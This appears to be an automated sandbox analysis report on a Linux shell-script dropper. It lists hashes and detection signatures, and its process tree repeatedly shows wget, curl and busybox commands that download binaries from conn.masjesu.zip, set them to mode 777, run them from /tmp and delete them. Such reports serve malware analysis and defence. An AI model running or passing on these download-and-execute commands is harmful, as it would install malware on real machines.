Analysis
-
max time kernel
104s -
max time network
109s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
28/10/2024, 02:13
Static task
static1
Behavioral task
behavioral1
Sample
1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1.sh
-
Size
10KB
-
MD5
85d74baef7ce93fd942b1abca31bf2dd
-
SHA1
a7e677437c07ce76e9242021261bc10ae3c1728e
-
SHA256
1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1
-
SHA512
01166c5328b88a37c6f813c2c230bfb8ab099386a4d9d45d663902833009e012859aa7452ea9d9bff524dc0bf6f3dd938c0df0225b65ece29ab5a364e10a5677
-
SSDEEP
192:ffd11BAjT2qH0+mhJy/EN71BAjTx9wrKS:ffdJqU+mhJy/ENqyrKS
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
description ioc Process
File opened for reading /proc/sys/crypto/fips_enabled curl
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1.sh/tmp/1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1.sh1⤵PID:698
-
/bin/rm/bin/rm bins.sh2⤵PID:704
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵PID:706
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:722
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵
- System Network Configuration Discovery
PID:728
-
-
/bin/chmodchmod 777 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵
- File and Directory Permissions Modification
PID:730
-
-
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d./5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵
- Executes dropped EXE
PID:731
-
-
/bin/rmrm 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵PID:732
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵PID:733
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:734
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵
- System Network Configuration Discovery
PID:736
-
-
/bin/chmodchmod 777 NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵
- File and Directory Permissions Modification
PID:737
-
-
/tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h./NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:738
-
-
/bin/rmrm NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵PID:739
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵
- System Network Configuration Discovery
PID:740
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:741
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵
- System Network Configuration Discovery
PID:743
-
-
/bin/chmodchmod 777 vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵
- File and Directory Permissions Modification
PID:744
-
-
/tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae./vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵
- Executes dropped EXE
PID:745
-
-
/bin/rmrm vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵PID:746
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵
- System Network Configuration Discovery
PID:747
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:748
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵PID:752
-
-
/bin/chmodchmod 777 u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵
- File and Directory Permissions Modification
PID:755
-
-
/tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd./u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵
- Executes dropped EXE
PID:756
-
-
/bin/rmrm u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵PID:757
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵PID:758
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵
- Reads runtime system information
- Writes file to tmp directory
PID:761
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵PID:770
-
-
/bin/chmodchmod 777 ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵
- File and Directory Permissions Modification
PID:773
-
-
/tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20./ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵
- Executes dropped EXE
PID:774
-
-
/bin/rmrm ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵PID:775
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵
- System Network Configuration Discovery
PID:776
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:779
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵
- System Network Configuration Discovery
PID:785
-
-
/bin/chmodchmod 777 mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵
- File and Directory Permissions Modification
PID:786
-
-
/tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i./mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵
- Executes dropped EXE
PID:788
-
-
/bin/rmrm mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵PID:789
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵
- System Network Configuration Discovery
PID:791
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:817
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵PID:819
-
-
/bin/chmodchmod 777 llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u./llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵
- Executes dropped EXE
PID:821
-
-
/bin/rmrm llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵PID:822
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵
- System Network Configuration Discovery
PID:823
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:824
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵
- System Network Configuration Discovery
PID:826
-
-
/bin/chmodchmod 777 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵
- File and Directory Permissions Modification
PID:827
-
-
/tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv./5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵
- Executes dropped EXE
PID:828
-
-
/bin/rmrm 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵PID:829
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵
- System Network Configuration Discovery
PID:830
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:831
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵PID:835
-
-
/bin/chmodchmod 777 TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵
- File and Directory Permissions Modification
PID:838
-
-
/tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd./TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:839
-
-
/bin/rmrm TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵
- System Network Configuration Discovery
PID:840
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵
- System Network Configuration Discovery
PID:842
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:846
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵
- System Network Configuration Discovery
PID:854
-
-
/bin/chmodchmod 777 lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵
- File and Directory Permissions Modification
PID:856
-
-
/tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo./lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵
- Executes dropped EXE
PID:858
-
-
/bin/rmrm lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵PID:859
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵
- System Network Configuration Discovery
PID:860
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵
- System Network Configuration Discovery
PID:869
-
-
/bin/chmodchmod 777 TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj./TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵PID:874
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵
- System Network Configuration Discovery
PID:876
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:880
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵
- System Network Configuration Discovery
PID:884
-
-
/bin/chmodchmod 777 ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC./ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵PID:887
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵PID:888
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵
- System Network Configuration Discovery
PID:891
-
-
/bin/chmodchmod 777 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH./0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵PID:894
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵PID:895
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵
- System Network Configuration Discovery
PID:898
-
-
/bin/chmodchmod 777 cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6./cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵PID:901
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵
- System Network Configuration Discovery
PID:902
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵PID:905
-
-
/bin/chmodchmod 777 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵
- File and Directory Permissions Modification
PID:906
-
-
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d./5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵
- Executes dropped EXE
PID:907
-
-
/bin/rmrm 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d2⤵PID:908
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵
- System Network Configuration Discovery
PID:909
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:910
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵
- System Network Configuration Discovery
PID:912
-
-
/bin/chmodchmod 777 NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h./NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:914
-
-
/bin/rmrm NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h2⤵
- System Network Configuration Discovery
PID:915
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵
- System Network Configuration Discovery
PID:916
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵
- System Network Configuration Discovery
PID:919
-
-
/bin/chmodchmod 777 vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae./vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae2⤵PID:922
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵
- System Network Configuration Discovery
PID:923
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵
- System Network Configuration Discovery
PID:926
-
-
/bin/chmodchmod 777 u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd./u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd2⤵PID:929
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵PID:930
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵PID:933
-
-
/bin/chmodchmod 777 ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵
- File and Directory Permissions Modification
PID:934
-
-
/tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20./ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵
- Executes dropped EXE
PID:935
-
-
/bin/rmrm ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr202⤵PID:936
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵
- System Network Configuration Discovery
PID:937
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵
- System Network Configuration Discovery
PID:940
-
-
/bin/chmodchmod 777 mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i./mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i2⤵PID:943
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵
- System Network Configuration Discovery
PID:944
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵PID:947
-
-
/bin/chmodchmod 777 llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵
- File and Directory Permissions Modification
PID:948
-
-
/tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u./llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵
- Executes dropped EXE
PID:949
-
-
/bin/rmrm llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u2⤵PID:950
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵
- System Network Configuration Discovery
PID:951
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:952
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵
- System Network Configuration Discovery
PID:954
-
-
/bin/chmodchmod 777 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv./5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv2⤵PID:957
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵
- System Network Configuration Discovery
PID:958
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵PID:961
-
-
/bin/chmodchmod 777 TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd./TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd2⤵PID:964
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵
- System Network Configuration Discovery
PID:965
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵
- System Network Configuration Discovery
PID:968
-
-
/bin/chmodchmod 777 lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo./lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo2⤵PID:971
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵
- System Network Configuration Discovery
PID:972
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵
- System Network Configuration Discovery
PID:975
-
-
/bin/chmodchmod 777 TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵
- File and Directory Permissions Modification
PID:976
-
-
/tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj./TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵
- Executes dropped EXE
PID:977
-
-
/bin/rmrm TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj2⤵PID:978
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵
- System Network Configuration Discovery
PID:979
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:980
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵
- System Network Configuration Discovery
PID:982
-
-
/bin/chmodchmod 777 ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵
- File and Directory Permissions Modification
PID:983
-
-
/tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC./ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵
- Executes dropped EXE
PID:984
-
-
/bin/rmrm ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC2⤵PID:985
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵PID:986
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:987
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵
- System Network Configuration Discovery
PID:989
-
-
/bin/chmodchmod 777 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵
- File and Directory Permissions Modification
PID:990
-
-
/tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH./0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵
- Executes dropped EXE
PID:991
-
-
/bin/rmrm 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH2⤵PID:992
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵
- System Network Configuration Discovery
PID:993
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:994
-
-
